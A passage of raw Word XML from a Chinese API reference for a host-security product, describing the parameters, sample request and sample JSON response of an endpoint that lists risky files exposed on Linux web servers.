          <w:p w14:paraId="2126B405" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64D4E42E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="43711923" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53281AF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="449EEAF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FA7F366" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09314D5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="09C774C4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64DE2A54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>filePath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A0AD7D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D065E11" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="085396A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="11558A93" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43D72C7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30D29479" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1996B05D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44F8A16C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23E0B6FC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19B1D0D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serverNameEq</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55A4AA3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29237E24" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51AAE359" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>域名，精确查找</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="074C2E00" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ED8995D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56809159" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D54FA3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6011007A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="57E8FC2E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="108D7C23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexTypes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EDFFECB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="123E6E71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="001F9D7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险文件类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="61922E6C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="201F46A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AE66A01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="247D9370" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="008DF8E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="652FF329" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="400BDF25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>portStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="227C61B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18BC6F36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10032F08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口访问性：-1-未知；0-关闭；1-打开</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0BEDCF27" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B906101" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>translate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CE65FE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CF9A9D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70F541E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>解析方式：0-host解析；1-dns解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D30C071" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12538E83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/websecurity/weakfile/linux?page=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8EFACD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3861B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "hostname",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nan.zhang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "5a5d08417d761b67a5bb712b",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 80,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>portStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": -1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "translate": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>serverName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "www.zhn.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>filePath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/home/qt/nan/test.doc",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>regexLevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>regexType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 8,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>regexTypeDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "Office文档",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "http://www.zhn.com:80/test.doc",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>modifyTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1504234128,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "download": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whiteRuleEffect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70088742"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694"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5837"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4D282F0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239E584" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5226BA37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32C2B1D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="722D411F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="00E01048" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19A22266" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C0E759F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51C35B68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E968E5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3244043C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EDD37C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77B0B749" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51745E7F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="785A10D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="081855AC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76633142" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5665AB69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="156DAD7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BA58627" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EAA3DD7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="289B503F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
